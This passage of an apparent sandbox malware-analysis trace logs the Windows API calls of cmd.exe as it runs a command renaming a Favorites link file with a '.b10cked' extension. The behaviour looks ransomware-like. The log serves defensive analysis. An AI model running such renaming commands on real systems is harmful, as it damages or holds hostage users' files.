"\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 31026 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 31027 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 31028 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 31029 start_va = 0x2c0000 end_va = 0x2c0fff entry_point = 0x0 region_type = private name = "private_0x00000000002c0000" filename = "" Region: id = 31030 start_va = 0x470000 end_va = 0x570fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 31031 start_va = 0x580000 end_va = 0x117ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 31032 start_va = 0x1180000 end_va = 0x12e2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001180000" filename = "" Thread: id = 713 os_tid = 0x114 [0210.922] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1efb3c | out: lpSystemTimeAsFileTime=0x1efb3c*(dwLowDateTime=0xb288a000, dwHighDateTime=0x1d440a9)) [0210.922] GetCurrentProcessId () returned 0x748 [0210.922] GetCurrentThreadId () returned 0x114 [0210.923] GetTickCount () returned 0x3b347 [0210.923] QueryPerformanceCounter (in: lpPerformanceCount=0x1efb34 | out: lpPerformanceCount=0x1efb34*=26771178314) returned 1 [0210.923] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0210.924] __set_app_type (_Type=0x1) [0210.924] __p__fmode () returned 0x76b331f4 [0210.924] __p__commode () returned 0x76b331fc [0210.924] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0210.924] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0210.924] GetCurrentThreadId () returned 0x114 [0210.924] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x114) returned 0x38 [0210.924] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0210.924] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0210.924] SetThreadUILanguage (LangId=0x0) returned 0x409 [0210.925] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0210.925] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1efacc | out: phkResult=0x1efacc*=0x0) returned 0x2 [0210.925] VirtualQuery (in: lpAddress=0x1efb03, lpBuffer=0x1efa9c, dwLength=0x1c | out: lpBuffer=0x1efa9c*(BaseAddress=0x1ef000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0210.925] VirtualQuery (in: lpAddress=0xf0000, lpBuffer=0x1efa9c, dwLength=0x1c | out: lpBuffer=0x1efa9c*(BaseAddress=0xf0000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0210.925] VirtualQuery (in: lpAddress=0xf1000, lpBuffer=0x1efa9c, dwLength=0x1c | out: lpBuffer=0x1efa9c*(BaseAddress=0xf1000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0210.925] VirtualQuery (in: lpAddress=0xf3000, lpBuffer=0x1efa9c, dwLength=0x1c | out: lpBuffer=0x1efa9c*(BaseAddress=0xf3000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0210.925] VirtualQuery (in: lpAddress=0x1f0000, lpBuffer=0x1efa9c, dwLength=0x1c | out: lpBuffer=0x1efa9c*(BaseAddress=0x1f0000, AllocationBase=0x1f0000, AllocationProtect=0x2, RegionSize=0x2000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0210.925] GetConsoleOutputCP () returned 0x1b5 [0210.925] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0210.925] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0210.925] _get_osfhandle (_FileHandle=1) returned 0x7 [0210.925] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0210.925] _get_osfhandle (_FileHandle=1) returned 0x7 [0210.925] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0210.926] _get_osfhandle (_FileHandle=1) returned 0x7 [0210.926] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0210.926] _get_osfhandle (_FileHandle=0) returned 0x3 [0210.926] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0210.926] _get_osfhandle (_FileHandle=0) returned 0x3 [0210.926] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0210.926] GetEnvironmentStringsW () returned 0x3801a0* [0210.927] FreeEnvironmentStringsW (penv=0x3801a0) returned 1 [0210.927] GetEnvironmentStringsW () returned 0x3801a0* [0210.927] FreeEnvironmentStringsW (penv=0x3801a0) returned 1 [0210.927] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1eea3c | out: phkResult=0x1eea3c*=0x40) returned 0x0 [0210.927] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1eea44, lpData=0x1eea48, lpcbData=0x1eea40*=0x1000 | out: lpType=0x1eea44*=0x0, lpData=0x1eea48*=0xc8, lpcbData=0x1eea40*=0x1000) returned 0x2 [0210.927] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1eea44, lpData=0x1eea48, lpcbData=0x1eea40*=0x1000 | out: lpType=0x1eea44*=0x4, lpData=0x1eea48*=0x1, lpcbData=0x1eea40*=0x4) returned 0x0 [0210.927] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1eea44, lpData=0x1eea48, lpcbData=0x1eea40*=0x1000 | out: lpType=0x1eea44*=0x0, lpData=0x1eea48*=0x1, lpcbData=0x1eea40*=0x1000) returned 0x2 [0210.927] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1eea44, lpData=0x1eea48, lpcbData=0x1eea40*=0x1000 | out: lpType=0x1eea44*=0x4, lpData=0x1eea48*=0x0, lpcbData=0x1eea40*=0x4) returned 0x0 [0210.927] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1eea44, lpData=0x1eea48, lpcbData=0x1eea40*=0x1000 | out: lpType=0x1eea44*=0x4, lpData=0x1eea48*=0x40, lpcbData=0x1eea40*=0x4) returned 0x0 [0210.927] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1eea44, lpData=0x1eea48, lpcbData=0x1eea40*=0x1000 | out: lpType=0x1eea44*=0x4, lpData=0x1eea48*=0x40, lpcbData=0x1eea40*=0x4) returned 0x0 [0210.927] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1eea44, lpData=0x1eea48, lpcbData=0x1eea40*=0x1000 | out: lpType=0x1eea44*=0x0, lpData=0x1eea48*=0x40, lpcbData=0x1eea40*=0x1000) returned 0x2 [0210.927] RegCloseKey (hKey=0x40) returned 0x0 [0210.927] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1eea3c | out: phkResult=0x1eea3c*=0x40) returned 0x0 [0210.927] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1eea44, lpData=0x1eea48, lpcbData=0x1eea40*=0x1000 | out: lpType=0x1eea44*=0x0, lpData=0x1eea48*=0x40, lpcbData=0x1eea40*=0x1000) returned 0x2 [0210.927] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1eea44, lpData=0x1eea48, lpcbData=0x1eea40*=0x1000 | out: lpType=0x1eea44*=0x4, lpData=0x1eea48*=0x1, lpcbData=0x1eea40*=0x4) returned 0x0 [0210.928] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1eea44, lpData=0x1eea48, lpcbData=0x1eea40*=0x1000 | out: lpType=0x1eea44*=0x0, lpData=0x1eea48*=0x1, lpcbData=0x1eea40*=0x1000) returned 0x2 [0210.928] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1eea44, lpData=0x1eea48, lpcbData=0x1eea40*=0x1000 | out: lpType=0x1eea44*=0x4, lpData=0x1eea48*=0x0, lpcbData=0x1eea40*=0x4) returned 0x0 [0210.928] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1eea44, lpData=0x1eea48, lpcbData=0x1eea40*=0x1000 | out: lpType=0x1eea44*=0x4, lpData=0x1eea48*=0x9, lpcbData=0x1eea40*=0x4) returned 0x0 [0210.928] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1eea44, lpData=0x1eea48, lpcbData=0x1eea40*=0x1000 | out: lpType=0x1eea44*=0x4, lpData=0x1eea48*=0x9, lpcbData=0x1eea40*=0x4) returned 0x0 [0210.928] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1eea44, lpData=0x1eea48, lpcbData=0x1eea40*=0x1000 | out: lpType=0x1eea44*=0x0, lpData=0x1eea48*=0x9, lpcbData=0x1eea40*=0x1000) returned 0x2 [0210.928] RegCloseKey (hKey=0x40) returned 0x0 [0210.928] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863ac [0210.928] srand (_Seed=0x5b8863ac) [0210.928] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\Default\\FAVORI~1\\Links\\WEBSLI~1.URL\" \"C:\\Users\\Default\\FAVORI~1\\Links\\Web Slice Gallery.url.b10cked\"" [0210.928] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\Default\\FAVORI~1\\Links\\WEBSLI~1.URL\" \"C:\\Users\\Default\\FAVORI~1\\Links\\Web Slice Gallery.url.b10cked\"" [0210.928] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0210.928] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x381900, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0210.929] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0210.929] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0210.929] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0210.929] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0210.929] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0210.929] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0210.929] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0210.929] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0210.929] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0210.929] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0210.929] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0210.929] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0210.929] GetEnvironmentStringsW () returned 0x3822f0* [0210.929] FreeEnvironmentStringsW (penv=0x3822f0) returned 1 [0210.929] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0210.929] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0210.930] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0210.930] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0210.930] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0210.930] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0210.930] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0210.930] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0210.930] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0210.930] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0210.930] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1ef808 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0210.930] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x1ef808, lpFilePart=0x1ef804 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x1ef804*="Desktop") returned 0x18 [0210.930] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0210.930] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x1ef584 | out: lpFindFileData=0x1ef584) returned 0x380030 [0210.930] FindClose (in: hFindFile=0x380030 | out: hFindFile=0x380030) returned 1 [0210.930] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x1ef584 | out: lpFindFileData=0x1ef584) returned 0x380030 [0210.931] FindClose (in: hFindFile=0x380030 | out: hFindFile=0x380030) returned 1 [0210.931] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x1ef584 | out: lpFindFileData=0x1ef584) returned 0x380030 [0210.931] FindClose (in: hFindFile=0x380030 | out: hFindFile=0x380030) returned 1 [0210.931] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0210.931] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0210.931] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0210.931] GetEnvironmentStringsW () returned 0x382b10* [0210.931] FreeEnvironmentStringsW (penv=0x382b10) returned 1 [0210.931] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0210.932] GetConsoleOutputCP () returned 0x1b5 [0210.932] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0210.932] GetUserDefaultLCID () returned 0x409 [0210.932] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0210.933] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x1ef948, cchData=128 | out: lpLCData="0") returned 2 [0210.933] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x1ef948, cchData=128 | out: lpLCData="0") returned 2 [0210.933] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x1ef948, cchData=128 | out: lpLCData="1") returned 2 [0210.933] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0210.933] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0210.933] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0210.933] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0210.933] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0210.933] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0210.933] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0210.933] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0210.933] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0210.933] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0210.933] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0210.934] GetConsoleTitleW (in: lpConsoleTitle=0x3708f8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0210.935] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0210.935] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0210.935] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0210.935] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0210.936] _wcsicmp (_String1="move", _String2=")") returned 68 [0210.936] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0210.936] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0210.936] _wcsicmp (_String1="IF", _String2="move") returned -4 [0210.936] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0210.936] _wcsicmp (_String1="REM", _String2="move") returned 5 [0210.936] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0210.939] GetConsoleTitleW (in: lpConsoleTitle=0x1ef640, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0210.939] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0210.939] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0210.939] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0210.939] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0210.939] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0210.939] _wcsicmp (_String1="move", _String2="CD") returned 10 [0210.939] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0210.939] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0210.939] _wcsicmp (_String1="move", _String2="REN") returned -5 [0210.939] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0210.939] _wcsicmp (_String1="move", _String2="SET") returned -6 [0210.939] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0210.939] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0210.939] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0210.940] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0210.940] _wcsicmp (_String1="move", _String2="MD") returned 11 [0210.940] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0210.940] _wcsicmp (_String1="move", _String2="RD") returned -5 [0210.940] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0210.940] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0210.940] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0210.940] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0210.940] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0210.940] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0210.940] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0210.940] _wcsicmp (_String1="move", _String2="VER") returned -9 [0210.940] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0210.940] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0210.940] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0210.940] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0210.940] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0210.940] _wcsicmp (_String1="move", _String2="START") returned -6 [0210.940] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0210.940] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0210.940] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0210.942] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0210.942] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0210.942] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x1ef3fc, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x1ef3f4, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x1ef3f4*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0210.942] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0210.942] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0210.942] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0210.942] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0210.942] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0210.943] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0210.943] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0210.943] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0210.943] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0210.943] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0210.943] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0210.944] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0210.944] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0210.944] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0210.944] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0210.944] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0210.944] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0210.944] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0210.944] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0210.944] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0210.945] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0210.945] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0210.945] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0210.945] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0210.945] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0210.945] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0210.945] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0210.945] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0210.945] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0210.945] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0210.945] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0210.945] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0210.945] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0210.945] _wcsicmp (_String1="WEBSLI~1.URL", _String2=".") returned 73 [0210.945] _wcsicmp (_String1="WEBSLI~1.URL", _String2="..") returned 73 [0210.945] GetFileAttributesW (lpFileName="C:\\Users\\Default\\FAVORI~1\\Links\\WEBSLI~1.URL" (normalized: "c:\\users\\default\\favori~1\\links\\websli~1.url")) returned 0x20 [0210.946] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x381e70 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0210.946] SetErrorMode (uMode=0x0) returned 0x0 [0210.946] SetErrorMode (uMode=0x1) returned 0x0 [0210.946] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\FAVORI~1\\Links\\WEBSLI~1.URL", nBufferLength=0x104, lpBuffer=0x1eed84, lpFilePart=0x1eed6c | out: lpBuffer="C:\\Users\\Default\\FAVORI~1\\Links\\WEBSLI~1.URL", lpFilePart=0x1eed6c*="WEBSLI~1.URL") returned 0x2c [0210.946] SetErrorMode (uMode=0x0) returned 0x1 [0210.946] GetFileAttributesW (lpFileName="C:\\Users\\Default\\FAVORI~1\\Links" (normalized: "c:\\users\\default\\favori~1\\links")) returned 0x11 [0210.946] _wcsicmp (_String1="WEBSLI~1.URL", _String2=".") returned 73 [0210.946] _wcsicmp (_String1="WEBSLI~1.URL", _String2="..") returned 73 [0210.946] GetFileAttributesW (lpFileName="C:\\Users\\Default\\FAVORI~1\\Links\\WEBSLI~1.URL" (normalized: "c:\\users\\default\\favori~1\\links\\websli~1.url")) returned 0x20 [0210.946] SetErrorMode (uMode=0x0) returned 0x0 [0210.946] SetErrorMode (uMode=0x1) returned 0x0 [0210.946] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\FAVORI~1\\Links\\WEBSLI~1.URL", nBufferLength=0x104, lpBuffer=0x1ef200, lpFilePart=0x1eef98 | out: lpBuffer="C:\\Users\\Default\\FAVORI~1\\Links\\WEBSLI~1.URL", lpFilePart=0x1eef98*="WEBSLI~1.URL") returned 0x2c [0210.946] SetErrorMode (uMode=0x0) returned 0x1 [0210.946] SetErrorMode (uMode=0x0) returned 0x0 [0210.946] SetErrorMode (uMode=0x1) returned 0x0 [0210.946] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\FAVORI~1\\Links\\Web Slice Gallery.url.b10cked", nBufferLength=0x104, lpBuffer=0x1ef408, lpFilePart=0x1eef98 | out: lpBuffer="C:\\Users\\Default\\FAVORI~1\\Links\\Web Slice Gallery.url.b10cked", lpFilePart=0x1eef98*="Web Slice Gallery.url.b10cked") returned 0x3d [0210.946] SetErrorMode (uMode=0x0) returned 0x1 [0210.947] SetLastError (dwErrCode=0x0) [0210.947] GetFileAttributesW (lpFileName="C:\\Users\\Default\\FAVORI~1\\Links\\Web Slice Gallery.url.b10cked" (normalized: "c:\\users\\default\\favori~1\\links\\web slice gallery.url.b10cked")) returned 0xffffffff [0210.947] GetLastError () returned 0x2 [0210.947] FindFirstFileExW (in: lpFileName="C:\\Users\\Default\\FAVORI~1\\Links\\WEBSLI~1.URL", fInfoLevelId=0x1, lpFindFileData=0x1ee914, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1ee914) returned 0x370eb8 [0210.947] FindNextFileW (in: hFindFile=0x370eb8, lpFindFileData=0x1ee914 | out: lpFindFileData=0x1ee914) returned 0 [0210.947] GetLastError () returned 0x12 [0210.947] FindClose (in: hFindFile=0x370eb8 | out: hFindFile=0x370eb8) returned 1 [0210.948] FindFirstFileExW (in: 